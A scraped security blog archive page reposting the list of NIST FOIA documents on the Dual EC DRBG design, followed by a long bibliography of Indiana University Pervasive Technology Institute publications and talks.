Never Ending Security

It starts all here

Category Archives: Research

NISTFOIA: FOIA for NIST documents related to the design of Dual EC DRBG



nistfoia


Results of a recent FOIA for NIST documents related to the design of Dual EC DRBG.

These FOIA results are the combined result of two separate requests. Thanks to the following requestors:

  • Matthew Stoller and Rep. Alan Grayson
  • Andrew Crocker and Nate Cardozo of EFF

I have contributed only OCR and hosting. Happy hunting,

Matt Green, 6/5/2014


1.15.2015 production/9.1.2 Keyless Hash Function DRBG.pdf
1.15.2015 production/ANSI X9.82 Discussions.pdf
1.15.2015 production/ANSI X9.82, Part 3 DRBGs Powers point July 20, 2004.pdf
1.15.2015 production/Appendix E_ DRBG Selection.pdf
1.15.2015 production/Comments on X9.82, Part 4_Constructions.pdf
1.15.2015 production/E1 Choosing a DRBG Algorithm.pdf
1.15.2015 production/Five DRBG Algorithms Kelsey, July 2004.pdf
1.15.2015 production/Hash Funciton chart.pdf
1.15.2015 production/Letter of transmittal 1.15.2015 .pdf
1.15.2015 production/Part 4_Constructions for Building and Validating RBG Mechanisms.pdf
1.15.2015 production/Scan_2015_01_27_13_05_55_026.pdf
1.15.2015 production/Validation Testing and NIST Statistical Test Suite July 22, 2004.pdf
1.22.2015 production/10.1.2 Hash function DRBG Using HMAC.pdf
1.22.2015 production/10.1.3 KHF_DRBG.pdf
1.22.2015 production/8.6.7 Nonce.pdf
1.22.2015 production/8.7 Prediction Resistance and Backtracking Resistance.pdf
1.22.2015 production/ANSI X9.82 Part 3 Draft July 2004.pdf
1.22.2015 production/Annex G_Informative DRBG mechanism Security Properties.pdf
1.22.2015 production/Appendix G Informative DRBG Selection.pdf
1.22.2015 production/Comments on X9.82 Part 1, Barker May 18, 2005.pdf
1.22.2015 production/Cryptographic security of Dual_EC_DRBG.pdf
1.22.2015 production/D.1 Choosing a DRBG Algorithm.pdf
1.22.2015 production/DRBG Issues Power Point July 20, 2004.pdf
1.22.2015 production/Draft X9.82 Part 3 Draft May 2005.pdf
1.22.2015 production/E.1 Choosing a DRBG Algorithm (2).pdf
1.22.2015 production/E.1 Choosing a DRBG Algorithm.pdf
1.22.2015 production/Final SP 800-90 Barker May 26, 2006.pdf
1.22.2015 production/Fwd_Final SP 800-90 Barker May 26, 2006.pdf
1.22.2015 production/Kelsey comments on SP April 12, 2006.pdf
1.22.2015 production/Latest SP 800-90 Barker May 5, 2006.pdf
1.22.2015 production/Letter of transmittal 1.22.2015.pdf
1.22.2015 production/SP 800-90 Barker June 28, 2006.pdf
1.22.2015 production/SP 800-90_pre-werb version> Barker May 9, 2006.pdf
1.22.2015 production/Terse Description of two new hash-based DRGBs Kelsey, January 2004.pdf
1.22.2015 production/Two New proposed DRBG Algorithms Kelsey January 2004.pdf
1.22.2015 production/X9.82, RGB, Issues for the Workshop.pdf
6.4.2014 production/001 – Dec 2005 -NIST Recomm Random No. Gen (Barker-Kelsey).pdf
6.4.2014 production/002 – Dec 2005 – NIST Recomm Random No. Gen (Barker-Kelsey)(2).pdf
6.4.2014 production/003 – Sept 2005 – NIST Recomm Random No. Gen (Barker-Kelsey).pdf
6.4.2014 production/004 – Jan 2004 – Terse Descr. of Two New Hash-Based DRBGs.pdf
6.4.2014 production/005 – Proposed Changes to X9.82 Pt. 3 (Slides).pdf
6.4.2014 production/006 – NIST Chart 1.pdf
6.4.2014 production/007 – RNG Standard (Under Dev. ANSI X9F1) – Barker.pdf
6.4.2014 production/008 – Random Bit Gen. Requirements.pdf
6.4.2014 production/009 – Seed File Use.pdf
6.4.2014 production/010 – NIST Chart 2.pdf
6.4.2014 production/011 – 9.12 Choosing a DRBG Algorithm.pdf
6.4.2014 production/012 – May 14 2005 – Comments on ASC X9.82 Pt. 1 – Barker.pdf
6.4.2014 production/013 – X9.82 Pt. 2 – Non-Deterministic Random Bit Generators.pdf

More info you can find on: https://github.com/matthewdgreen/nistfoia


Indiana University Pervasive Technology Institute Bibliography


Cate, F. H., The Growing Importance – and Irrelevance- of Data Protection Law, 2012 PIPA Conference, Offices of the Information and Privacy Commissioners of Alberta and British Columbia, Calgary, Canada, Nov 2012, Submitted.

Cate, F. H., and V. Mayer-Schonberger, Notice and Consent in a World of Big Data Technology Academics Policy Blog, Nov 2012, Submitted.

Shackelford, S., Southeast Academy of Legal Studies in Business (SEALSB), Southeast Academy of Legal Studies in Business (SEALSB), Miami, FL, Nov 2012, Submitted.

Cate, F. H., and B. E. Cate, The Supreme Court and Information PolicyInternational Data Privacy Law, 4, vol. 2, Nov 2012, Submitted.

Cate, F. H., J. Dempsey, and I. Rubinstein, Systematic Government Access to Private-Sector Data International Data Privacy Law, 4, vol. 2, Nov 2012, Submitted.

Shackelford, S. J., Toward Cyber Peace: Managing Cyber Attacks through Polycentric Governance American University Law Review, no. 2013, Nov 2012, Submitted.

Li, F., X. Zou, P. Liu, and Y. Chen, New threats to health data privacy BioMed Central, Nov 2011, Submitted.

Qiu, J., and S. – H. Bae, Performance of Windows Multicore Systems on Threading and MPI , Bloomington, IN, Indiana University, Nov 2010, Submitted. Abstract

Cate, F. H., Consumer Privacy in an Age of Universal and Instant Communications, Advance 2012, ID Analytics, San Diego, CA, Oct 2012, Submitted.

Cate, F. H., Is There Any Hope for Cybersecurity, Stanford University Computer Science Department, Stanford, CA, Oct 2012, Submitted.

Cate, F. H., Mr. President, We Have a Situation, 2012 CACR Cybersecurity Summit, Indianapolis, IN, Oct 2012, Submitted.

Fidler, D. P., Mr. President, We Have a Situation, 2012 CACR Cybersecurity Summit, Indianapolis, IN, Oct 2012, Submitted.

Cate, F. H., Privacy, Law and Technology: What Happens Next?, Stanford Law School, Stanford, CA, Oct 2012, Submitted.

Cate, F. H., Private-Sector Profiling, Closed Session of the 34th International Data Protection and Privacy Commissioners’ Conference , Punta del Este, Uruguay, Oct 2012, Submitted.

Shackelford, S. J., Neither Magic Bullet Nor Lost Cause: Land Titling and the Wealth of Nation (forthcoming) New York University Environmental Law Journal , Sep 2013, Submitted.

Cate, F. H., Cate vs. Shel: The Great Cloud Debate, Statewide IT Conference, Indiana University, Bloomington, IN, Sep 2012, Submitted.

Fidler, D. P., Legal Aspects of NATO Cyber Cooperation Activities, NATO Legal Conference, Tirana, Albania, Sep 2012, Submitted.

Cate, F. H., Microsoft Global Privacy Summit (Moderator), Microsoft Global Privacy Summit, Redmond, WA, Sep 2012, Submitted.

Cate, F. H., Notice and Consent in a World of Big Data, Microsoft Corporation, Sep 2012, Submitted.

Cate, F. H., Roundtable on Cyber Threats, Objectives, and Responses (Moderator), Roundtable on Cyber Threats, Objectives, and Responses , Pentagon City, VA, Sep 2012, Submitted.

von Laszewski, G., H. Lee, J. Diaz, F. Wang, K. Tanaka, S. Karavinkoppa, G. C. Fox, and T. Furlani, Design of an Accounting and Metric-based Cloud-shifting and Cloud-seeding framework for Federated Clouds and Bare-metal Environments The International Conference on Autonomic Computing (IAC), San Jose, CA, Aug 2012, Submitted. Abstract

Cate, F. H., A Time to Act, 43rd Triennial Council of Phi Beta Kappa, Palm Beach, FL, Aug 2012, Submitted.

Ruan, G., H. Zhang, E. Wernert, and B. Plale, TextRWeb: Large-Scale Text Analytics with R on the Web Conference on Extreme Science and Engineering Discovery Environment (XSEDE’14), Atlanta, USA, Jul 2014, Submitted.

Kapadia, A., V. Garg, S. Patil, and L. Jean Camp, Peer-produced Privacy Protection IEEE International Symposium on Technology and Society , Jul 2013, Submitted.

Rundle, J., and G. Fox, Computational Earthquake Science Computing in Science & Engineering, Jul 2012, Submitted.

Welch, V., Security at the Cyberborder Workshop Report Presentation, Summer 2012 ESCC/INternet2 Joint Techs, Jul 2012, Submitted.

Zhanquan, S., and G. Fox, Study on Parallel SVM Based on MapReduce The 2012 International Conference on Parallel and Distributed Processing Techniques and Applications, Las Vegas NV USA, Jul 2012, Submitted. Abstract

Zeng, J., G. Ruan, A. Crowell, A. Prakash, and B. Plale, Cloud Computing Data Capsules for Non-Consumptive Use of Texts 5th Workshop on Scientific Cloud Computing (ScienceCloud) , Vancouver, Canada, Jun 2014, Submitted.

Shackelford, S. J., Cyber Peace: Countering Cyber Attacks Around the World, IU Mini University, Bloomington, IN, Jun 2012, Submitted.

Fidler, D. P., The Ethics of ‘Non-Lethal’ Weapons, National Research Council’s Committee on Ethical and Societal Issues in National Security Applications of Emerging Technologies, Irvine, CA, Jun 2012, Submitted.

Shackelford, S. J., Fragile Merchandise: A Comparative Analysis of the Privacy Rights of Public Figures American Business Law Journal, vol. 19, no. 1, Jun 2012, Submitted.

Fidler, D. P., Inter Arma Silent Leges Redux? The Law of Armed Conflict and Cyberconflict National Security and Cyberspace: Threats, Opportunities, and Power in a Virtual World, Washington D.C., Georgetown University Press, pp. 71-87, Jun 2012, Submitted.

Cate, F. H., Overclocked: Law and Privacy in the Digital World, 2012 Bench Bar Conference, Indianapolis BAR Association, French Lick, IN, Jun 2012, Submitted.

Cate, F. H., The Supreme Court and Privacy in the Commerical Sector, The Center for Information Policy Leadership Annual Retreat, Washington, D.C., Jun 2012, Submitted.

Cate, F. H., The Growing Importance (and Irrelevance) of International Data Protection Law, 2013 Manitoba Access, Privacy, Security & Information Conference—Making Connections, Winnipeg, Canada, May 2013, Submitted.

Barnett, W. K., and R. LeDuc, Next Generation Cyberinfrastructures for Next Generation Sequencing and Genome Science, The AAMC 2013 Information Technology in Academic Medicine Conference Vancouver, CA. June 5, 2013 , Vancouver, CA., May 2013, Submitted.

 Download: 2013_aamc_gir_ncgas-barnett-final.pptx (12.99 MB)

Cate, F. H., The Promise and Perils of Personal Information in Healthcare, 2nd Annual Western Canada Health Information Privacy Symposium, May 2013, Submitted.

Cate, F. H., The Promise and Perils of Personal Information in Healthcare, Monroe-Owen County Medical Society Annual Meeting, Bloomington, Indiana, May 2013, Submitted.

, Accelerating System Software for Extreme Scale Computing – Keynote Address, ATIP/A*CRC Workshop on Accelerator Technologies for HPC, Singapore, May 2012, Submitted.

Jallalbarsari, V., and D. Leake, Customizing Question Selection and Facilitating Flexible Response in Conversational Case-Based Reasoning Twenty-Fifth Florida Artificial Intelligence Research Society Conference, Marco Island, FL USA, AAAI Press, May 2012, Submitted.

Fidler, D. P., Inter Arma Silent Leges Redux? Law of Armed Conflict and Cyberconflict NATIONAL SECURITY AND CYBERSPACE, May 2012, Submitted.

Fidler, D. P., The Internet, Human Rights, and U.S. Foreign Policy: The Global Online Freedom Act of 2012 AMERICAN SOCIETY OF INTERNATIONAL LAW INSIGHTS, May 2012, Submitted.

Huan, T., X. Wu, Z. Bai, and J. Y. Chen, Seed-weighted Random Walk Ranking for Cancer Biomarker Prioritization: a Case Study in Leukemia International Journal of Data Mining and Bioinformatics, May 2012, Submitted.

Mitchell, J. E., D. J. Crandall, G. C. Fox, and J. D. Paden, A SEMI-AUTOMATIC APPROACH FOR ESTIMATING NEAR SURFACE INTERNAL LAYERS FROM SNOW RADAR IMAGERY IGARSS 2013 Sunday 21 – Friday 26 July 2013 IEEE International Geoscience and Remote Sensing Symposium, Melbourne, Australia “Building a Sustainable Earth through Remote Sensing”, May 15 2013, Submitted.

Ozsoy, A., A. Chauhan, and M. Swany, Achieving TeraCUPS on Longest Common Subsequence Problem using GPGPUs IEEE Supercomputing 2013 (SC13), Apr 2013, Submitted.

Cate, F. H., Cybersecurity Threats and Policy Issues, Board of Directors of the IU Credit Union retreat, French Lick, Indiana, Apr 2013, Submitted.

Cate, F. H., Privacy Principles for the 21st Century, Privacy Policy Workshop at Microsoft Corporation, Redmond, Washington, Apr 2013, Submitted.

Gunarathne, T., B. Salpitikorala, A. Chauhan, and G. Fox, Iterative Statistical Kernels on Contemporary GPUs International Journal of Computational Science and Engineering, Apr 2012, Submitted.

Wang, L., G. von Laszewski, S. Marru, J. Tao, and M. Kunze, Schedule Distributed Virtual Machines in a Service Oriented Environment, talk not presented due to visa issues, 24th IEEE International Conference on Advanced Information Networking and Applications (AINA’10), Perth, Australia, Apr 2010, Submitted.

 Download: aina10.pdf (1.11 MB)

Anderson, M., talk: Improving scaling constrained applications using ParalleX, {Pervasive Technology Institute Major Project Review, Bloomington, IN} year = 2012, Apr , Submitted.

Adusumilli, P., Y. Sui, X. Zou, B. Ramamurthy, and F. Li, A Key Distribution Scheme for Distributed Group with Authentication Capability International Journal of Performability Engineering, vol. 8, no. 2, Mar 2012, Submitted. Abstract

Fidler, D. P., Tinker, Tailor, Soldier, Duqu: Why Cyberespionage is More Dangerous than You Think INTERNATIONAL JOURNAL OF CRITICAL INFRASTRUCTURE PROTECTION, vol. 5, no. 1, Mar 2012, Submitted.

Anderson, M., talk: Graphs in Adaptive Mesh Refinement, {PXGL Kickoff meeting, Bloomington, IN} year = 2012, Mar , Submitted.

Sterling, T., Connections for Coordination of DOE Exascale Research and Development, Livermore, California, Prsentation at the DOE Exascale Ecosystem Coordination Meeting, Feb , Submitted.

, , Submitted.

Myers, S. A., M. Sergi, and A. Shelat, Black-Box Proof of Knowledge of Plaintext and Multiparty Computation with Low Communication Overhead Proceedings of 10th Annual Theory of Cryptography Conference, Submitted.

Kowalczyk, S., L. Auvil, and M. Chen, HTRC demo and hands-on, The 13th ACM/IEEE-CS joint conference on Digital libraries, Indianapolis, IN, Submitted.

In Press

Huan, T., X. Wu, Z. Bai, and J. Y. Chen, Seed-weighted Random Walk Ranking for Cancer Biomarker Prioritization: a Case Study in Leukemia International Journal of Data Mining and Bioinformatics, May 2012, In Press.

Springer, J., F. Zhang, P. Hussey, C. Buck, F. Regnier, and J. Y. Chen, Towards a Metadata Model for Mass-Spectrometry Based Clinical Proteomics Current Bioinformatics, vol. 7, no. 4, May 2012, In Press.

2015

Bhattacharyya, S., and M. Chen, HathiTrust Research Center: Large-Scale Computational Analysis on the World’s First Massive Digital Library, Workshop, Linguistic Society of America (LSA)’s Biennial Linguistic Institute, Chicago, IL, Jul 2015. Abstract

2014

Plale, B., Bridging Digital Humanities Research and Large Repositories of Digital Text, 2nd Encuentro de Humanistas Digitales, Biblioteca Vasconcelos, Mexico City, Mexico, May 21 2014.

Organisciak, Peter, B. Plale, S. J. Downie, and L. Auvil, Panel Discussion: ‘The HathiTrust Research Center.’, Chicago Colloquium on Digital Humanities and Computer Science (DHCS 2014), Northwestern University, Evanston, Illinois, Oct 2014. Abstract

Organisciak, P., S. Bhattacharyya, L. Auvil, and S. J. Downie, Large-scale text analysis through the HathiTrust Research Center, Digital Humanities 2014 (DH2014) Conference, Lausanne, Switzerland, Jul 2014.

Run, G., H. Zhang, E. Wernert, and B. Plale, TextRWeb: Large-Scale Text Analytics with R on the Web XSEDE 2014, Atlanta, GA USA, Jul 2014.

 Download: xsede_14_-_xsede.pdf (11.29 KB)

Ando, M., J. Sotomil, and H. Zhang, Visualizing and Correlating Fluorescence and Microfocus Computed Tomograph (uCT) Images of White-spot Lesions The 61th Congress of the European Organisation for Caries Research , Greifswald, Germany, Jul 2014.

 Download: hui_zhang_-_publications.pdf (16.93 KB)

Chen, M., HathiTrust Research Center: Technical Challenges, Open Syllabus Project (OSP) Workshop, June 6-7, 2014, New York, NY., Jun 2014.

Ping, R. J., R. LeDuc, M. R. Link, S. A. Michael, and E. A. Wernert, UITS Research Technologies Cyberinfrastructure for Researchers: IUSE InfoShare 2014, Indiana University Southeast, Library (x2) and Natural Sciences Building, Apr 2014.

 Download: 2014iuse_uits-rt-infoshare.pdf (2.64 MB)

M.Ando, T. Sakagami, H. Zhang, G. J. Eckert, and D. Zero, Evaluation of Natural Non-cavitated Caries Lesions for Severity and Activity AADR Annual Meeting & Exhibition , Charlotte, NC, USA, Mar 2014.

 Download: archives.cgi_.pdf (24.28 KB)

Chen, M., HathiTrust Research Center: Challenges and Opportunities in Big Text Data, Digital Library Brown Bag, Indiana University Bloomington Libraries., Mar 2014.

Chen, M., Opportunities and Challenges of Text Mining HathiTrust Digital Library, Computational Linguistics Seminar, Indiana University Bloomington, Feb 2014.

2014

Xu, L., H. Zhang, and Y. C, Cooperative Gazing Behaviors in Multi-robot Human Interaction Journal of Interaction Studies, vol. Volume 14, no. Issues (14:3), Jan 2014.

 Download: john_benjamins_publishing_company.pdf (148 bytes)

Bhattacharyya, S., and R. Mehta, Investigating Writer’s Attitudes by Mining a Large Corpus of Books: Preliminary Research, Postdoctoral Research Symposium, Society of Postdoctoral Scholars, University of Illinois, Urbana-Champaign, Jan 2014.

Downie, S. J., K. Dougan, S. Bhattacharyya, and C. Fallaw, The HathiTrust Corpus: A Digital Library for Musicology Research? First International Digital Libraries for Musicology Workshop (DLfM 2014), London, UK, 2014. Abstract

York, J., and S. Bhattacharyya, Humanistic inquiry with large corpora of digitized text and metadata: Towards new epistemologies? Workshop, 130th Annual Conference of the Modern Language Association (MLA), Vancouver, Canada, 2014.

2013

Fox, G., T. Hey, and A. Trefethen, Where does all the data come from? “Data Intensive Science” , January 25 2013.

Fox, G., Distributed Data and Software Defined Systems BDEC Big Data and Extreme-Scale Computing Charleston April 30 to May 01, Renaissance Charleston Historic District Hote, April 20 2013.

Cole, T., and H. Green, Workset Creation for Analysis — an HTRC initiative, Coalition for Networked Information (CNI) Membership Meeting, Washington, DC., Dec 2013.

Downie, S. J., The Workset Creation for Scholarly Analysis (WCSA) Prototyping Project: Background and goals, Chicago Colloquium on Digital Humanities and Computer Science, Chicago, IL, Dec 2013.

Dunn, J. W., and S. Elnabli, Avalon Media System, Association of Moving Image Archivists, Seattle, Washington, Dec 2012, 2013.

2013

McDonald, R. H., Kuali OLE Seminar, National and University Libraries (SCONUL-UK), London, UK, Dec 2012, 2013.

Winkler, M., and R. H. McDonald, Kuali OLE: A Community Collaboration in Software for and by Libraries. Information Standards Quarterly (ISQ) , vol. 24(4) , Dec 2012, 2013.

Swany, M., Challenges and Solutions in Large Scale Data Movement, Supercomputing 2013, Denver, CO, Nov 2013.

Reagan, D., E. Vesperini, A. L. Varri, P. Beard, and C. Eller, Early Evolution of a Star Cluster in the Galactic Tidal Field, Supercomputing 2013 Visualization Showcase, Denver, Colorado, Nov 2013.

Kissel, E., M. Swany, B. Tierney, and E. Pouyoul, Efficient wide area data transfer protocols for 100 Gbps networks and beyond In Proceedings of the Third International Workshop on Network-Aware Data Management (NDM ’13), Denver, CO, Nov 2013.

Reagan, D., A. S. Schneider, C. J. Horowitz, J. Hughto, D. K. Berry, E. A. Wernert, and C. Eller, Nuclear Pasta, Supercomputing 2013 Visualization Showcase, Denver, Colorado, Nov 2013.

Plale, B., Opportunities and Challenges of Text Mining HathiTrust Digital Library, Koninklijke Bibliotheek, Den Haag, Netherlands, Nov 2013. Abstract

Ping, R. J., K. Seiffert, J. Tillotson, G. Turner, and K. Kallback-Rose, Ready, Set, Robots!: Early development of K-12 in STEM, The International Conference for High Performance Computing, Networking, Storage and Analysis (SC13),http://sc13.supercomputing.org/, Denver, CO, Nov 2013. Abstract

 Download: readysetrobotspresentation.pdf (15.02 MB)

Ozsoy, A., A. Chauhan, and M. Swany, Towards Tera-scale Performance for Longest Common Subsequence using Graphics Processors, Poster at International Conference for High Performance Computing, Networking, Storage and Analysis , Denver, CO, Nov 2013.

McDonald, R. H., S. Liyanage, M. Pathirage, Z. Peng, J. Zeng, G. Ruan, and M. Chen, Using Hathi Trust Center Tools, Catapult Workshop., Bloomington, IN, Nov 2013.

Hess, K., S. J. Downie, T. Cole, and H. Green, Workset Creation for Scholarly Analysis: Preliminary Research at HathiTrust Research Center, Community Idea Exchange presented at: DLF Forum 2013, Austin, TX, Nov 2013.

El-Khamra, Y., N. Gaffney, D. Walling, E. Wernert, W. Xu, and H. Zhang,Performance evaluation of R with Intel Xeon Phi Coprocessor First Workshop on Benchmarks, Performance Optimization, and Emerging hardware of Big Data Systems and Applications (BPOE 2013), in conjunction with 2013 IEEE International Conference on Big Data (IEEE Big Data 2013), Silicon Valley, CA, USA, Oct 2014, 2013.

 Download: ieee_xplore_abstract_-_performance_evaluation_of_r_with_intel_xeon_phi_coprocessor.txt (11.22 KB)

Boyles, M., D. Chattopadhyay, and D. Bolchini, Advanced Visualization and Collaboration using IQ-Walls, Indiana University Statewide IT Conference, Bloomington, IN, Oct 2013.

Frend, C., Augmented Reality at IU, Indiana University Statewide IT Conference, Bloomington, IN, Oct 2013.

Plale, B., Big Data Opportunities and Challenges for IR, Text Mining and NLP, Int’l Workshop on Mining Unstructured Big Data Using Natural Language Processing (MNLP 2013), co-located with ACM Int’l Conference on Information and Knowledge Management, San Francisco, CA, Oct 2013.

Underwood, T., M. Black, L. Auvil, and B. Capitanu, Mapping Mutable Genres in Structurally Complex Volumes 2013 IEEE International Conference on Big Data, Santa Clara, CA, Oct 2013.

Luo, Y., E. Kissel, B. Plale, and M. Swany, Network Transfer over Pacific Rim on PRAGMA Cloud, The 25th Workshop of Pacific Rim Applications and Grid Middleware Assembly (PRAGMA25) , Beijing, China, Oct 2013.

Zhou, Q., and B. Plale, Provenance Collection of Biodiversity Analysis on PRAGMA Cloud for Data Sharing, The 25th Workshop of Pacific Rim Applications and Grid Middleware Assembly (PRAGMA25) , Beijing, China, Oct 2013.

Plale, B., Big Data and Open Access: On Track for Collision of Cosmic Proportions?, 2nd Int’l LSDMA-Symposium – The Challenge of Big Data in Science – with a focus on Big Data Analytics, Karlsruhe, Germany, Sep 2013.

Stewart, C. A., M. R. Link, and D. Y. Hancock, Big Red II & Supporting Infrastructure, IEEE Cluster 2013, Indianapolis, Indiana, Sep 2013.

Stewart, C. A., Goodbye from Indianapolis, IUPUI, and IEEE Cluster 2013, Cluster 2013, Indianapolis, Indiana, Sep 2013.

Kowalczyk, S., K. Hess, and L. Auvil, Hands On: Workset Builder, Portal and SEASR., HTRC UnCamp 2013, Champaign, IL, Sep 2013.

Plale, B., R. McDonald, and M. Chen, The HathiTrust Research Center (HTRC): Exploration of the World’s First Massive Digital Library, Digital HPS (History and Philosophy of Science) workshop, Indiana University Bloomington, Sep 2013.

2013

Shankar, A., and W. K. Barnett, HIPAA and Advanced Scientific Computing The Coalition for Academic Scientific Computation, Arlington, Va., Sep 2013.

 Download: casc_hipaa-091713.docx (117.15 KB)

Mitchell, J. E., D. J. Crandall, G. C. Fox, and J. D. Paden, A Survey of Techniques for Detecting Layers in Polar Radar Imagery Abstract for International Symposium on Radioglaciology, in conjunction with the International Glaciological Society from September 9 to 13, 2013 , CReSIS at the University of Kansas, Lawrence, Kansas, Sep 2013.

Reagan, D., W. Sherman, E. Vesperini, A. Varri, and C. Eller, Visualization of Globular Star Clusters, IEEE Cluster 2013 Visualization Showcase, Sep 2013.

Reagan, D., A. Schneider, C. Horowitz, J. Hughto, D. Berry, E. Wernert, and C. Eller, Visualization of Nuclear Pasta , IEEE Cluster 2013 Visualization Showcase, Sep 2013.

Stewart, C. A., Welcome to Indianapolis, IUPUI, and IEEE Cluster 2013, IEEE Cluster 2013, Indianapolis, Indiana , Sep 2013.

Ruan, G., H. Zhang, and B. Plale, Exploiting MapReduce and Data Compression for Data-intensive Applications XSEDE 13: Gateway to Discovery, San Diego, CA, ACM, Jul 2013. Abstract

Ruan, G., H. Zhang, and B. Plale, Exploiting MapReduce and data compression for data-intensive applications Conference on Extreme Science and Engineering Discovery Environment: Gateway to Discovery (XSEDE ’13), San Diego, CA, Jul 2013.

Kowalczyk, S. T., HathiTrust Research Center: Big Data for Digital Humanities: A Panel Discussion on Managing Big Data and Big Metadata. Joint Conference on Digital Libraries (JCDL 2013), Indianapolis, IN, ACM/IEEE, Jul 2013.

Chen, M., U. Pavalanathan, S. Jensen, and B. Plale, Modeling Heterogeneous Data Resources for Social-Ecological Research: A Data-Centric PerspectiveJoint Conference on Digital Libraries 2013 (JCDL 2013), Indianapolis, IN, Jul 2013. Abstract

Knepper, R., B. Hallock, C. A. Stewart, M. Link, and M. Jacobs, Rockhopper: a true HPC system with cloud concepts, XSEDE CONFERENCE , San Diego, CA. 92101, Jul 2013.

 Download: cluster13poster.pdf (193.34 KB)

Kanewala, T. A., M. Pierce, and S. Marru, Secure Credential Sharing in Science Gateways, XSEDE 2013 SAN DIEGO, CA, Jul 2013.

 Download: xsede13_submission_261_1_2.pdf (314.32 KB)

Zhang, H., M. J. Boyles, G. Ruan, H. Li, H. Shen, and M. Ando, XSEDE-enabled high-throughput lesion activity assessment Conference on Extreme Science and Engineering Discovery Environment: Gateway to Discovery (XSEDE ’13), San Diego, CA, Jul 2013.

Ozsoy, A., A. Chauhan, and M. Swany, Achieving TeraCUPS on Longest Common Subsequence Problem using GPGPUs The 19th IEEE International Conference on Parallel and Distributed Systems (ICPADS’13), Seoul, South Korea, Jun 2013.

2013
Edmonds, N., J. Willcock, and A. Lumsdaine, Expressing Graph Algorithms Using Generalized Active Messages International Conference on Supercomputing, Jun 2013.

McDonald, R., and Y. Sun, The HathiTrust Research Center (HTRC): An Overview and Demo, Indiana University Librarians’ Day, Indianapolis, IN, Jun 2013.

Ganote, C., and T. Doak, Intro to Bioinformatics – Assembling a Transcriptome, Presented during the Clark State student visit and workshop, Bloomington, Indiana, Jun 2013.

 Download: assemblyshort_t.pptx (260.08 KB)

LeDuc, R., Leveraging the National Cyberinfrastructure for Top Down Mass Spectrometry, Annual Conference for the American Society for Mass Spectrometry, Minneapolis, Minnesota, Jun 2013.

 Download: lightning_talk_final.pptx (602.96 KB)

LeDuc, R., and L. – S. Wu, Using Prior Knowledge to Improve Scoring in High-Throughput Top-Down Proteomics Experiments, American Society for Mass Spectrometry Annual Conference, Minneapolis, Minnesota, Jun 2013.

 Download: leduc_asms_scoring_talk-3.pptx (989.93 KB)

Wimalasena, C., S. Marru, and M. Pierce, Derivations from Science Gateway Data Management Survey, XSEDE 2013 San Diego, CA July 22-25th, 013, May 2013.

McKelvey, K., and F. Menczer, Design and Prototyping of a Social Media Observatory First International Web Observatory Workshop (WOW), Rio de Janeiro, Brazil, May 2013.

Plale, B., and Y. Sun, Digital Humanities at Scale: HathiTrust Research Center, University of Notre Dame digital humanities seminar, South Bend, IN, May 2013.

Ahn, Y. – Y., and S. Ahnert, The Flavor Network Leonardo, MIT Press Journals, vol. 46, no. 3, pp. 272-273, May 2013.

Holk, E., M. Pathirage, A. Chauhan, A. Lumsdaine, and N. D. Matsakis, GPU Programming in Rust: Implementing High-Level Abstractions in a Systems-Level Language Eighteenth International Workshop on High-Level Parallel Programming Models and Supportive Environments (HIPS’13), May 2013.

McKelvey, K., and F. Menczer, Interoperability of Social Media ObservatoriesWeb Science 2013 Workshop: Building Web Observatories, Paris, France, May 2013.

Crandall, D., Layer-finding in radar echograms using probabilistic graphical models, Radar Echo Sounding Workshop, University of Copenhagen, Copenhagen, Denmark, May 2013.

Mao, H., X. Shuai, Y. – Y. Ahn, and J. Bollen, Mobile Communications Reveal the Regional Economy in Cote D’ivoire NetMob 2013: Data for Development Challenge, Cambridge, MA, May 2013.

Lumsdaine, A., New Execution Models are Required for Big Data at Exascale, Panel presentation at Big Data and Extreme-scale Computing, May 2013.

Lumsdaine, A., The Parallel BGL: A High-Performance Parallel Graph Algorithms Library, Presentation at University of Alabama at Birmingham, May 2013.

Weng, L., J. Ratkiewicz, N. Perra, B. Goncalves, C. Castillo, R. Bonchi, FrancescoSchifanella, F. Mencer, and A. Flammini, The Role of Information Diffusion in the Evolution of Social NetworksThe 19th ACM SIGKDD conference on knowledge, discovery, and data mining. (KDD), Chicago, Illinois, May 2013.

2013
Friedley, A., Shared Memory Communication in MPI, Berkeley, CA, Presentation at Lawrence Berkeley National Laboratory, May 2013.

Cate, F. H., Accountability Through Attribution: Real Name vs. Anonymity, U.S.-China Internet Industry Forum, Beijing, China, Apr 2013.

Ozsoy, A., A. Chauhan, and M. Swany, Achieving TeraCUPS on Longest Common Subsequence Problem using GPGPUs IEEE Supercomputing 2013 (SC13), Denver, CO, Apr 2013.

Dunn, J., and C. Stewart, The Avalon Media System: An Open Sourse Audio/Video System for Libraries and Archives, Coalition for Networked Information (CNI) Membership Meeting, San Antonio, Texas, Apr 2013.

Simms, S. C., Big Red II Workshop, Big Red ll Workshop, Indiana University – Bloomington Campus, Apr 2013.

 Download: big_red_ll_workshop.pdf (372.33 KB)

Hallock, B., Cyberinfrastructure Resources for Bioinformatics Research, Bio-IT World Expo Boston MA, Apr 2013.

 Download: biwposter.pdf (410.51 KB)

Cate, F. H., Cybersecurity Challenges in Higher Education, Internet2 Annual Members Meeting, Crystal City, Virginia, Apr 2013.

Cate, F. H., Cybersecurity Challenges in Higher Education, Internet2 Annual Members Meeting, Crystal City, Virginia, Apr 2013.

Simms, S. C., Data Intensive Research Using the Lustre File System, Indiana University – Bloomington Campus, Apr 2013.

 Download: dod.pptx (14.14 MB)

Swany, M., Effective and Efficient Utilization of Networks , University of California, Santa Barbara CS Career Day 2013, Santa Barbara, CA, Apr 2013.

Knepper, R., and M. Standish, Forward Observer In-Flight Dual Copy System, U.S. Naval Academy Annapolis, Maryland, Apr 2013.

Arap, O., G. Brown, B. Himebaugh, and M. Swany, Implementing MPI_Barrier with the NetFPGA IEEE Supercomputing 2013 (SC13), Denver, CO, Apr 2013.

Plale, B., International Data Sharing, Open Access, and the Research Data Alliance, Advanced Regional & State Networks (ARNs): Envisioning the Future as Critical Partners in Data-Driven Science , Washington, D.C., Apr 2013.

Fidler, D. P., Internet Governance and the International Telecommunication Regulations, The Changing Face of Global Governance, Oxford, England , Apr 2013.

Fidler, D. P., The Jurisprudence of Cybersecurity, Big 10 Faculty Colloquium, University of Nebraska College of Law, Apr 2013.

Fidler, D. P., NATO, Cybersecurity, and International Law, Cyberconflict: Threats, Responses, and the Role of Law, St. John’s University School of Law in Queens, New York, Apr 2013.

Quick, R., Open Science Grid Campus Infrastructures Communities, EGI Community Forum Manchester UK, Apr 2013.

Quick, R., Open Science Grid Operations Overview, EGI Community Forum Manchester UK, Apr 2013.

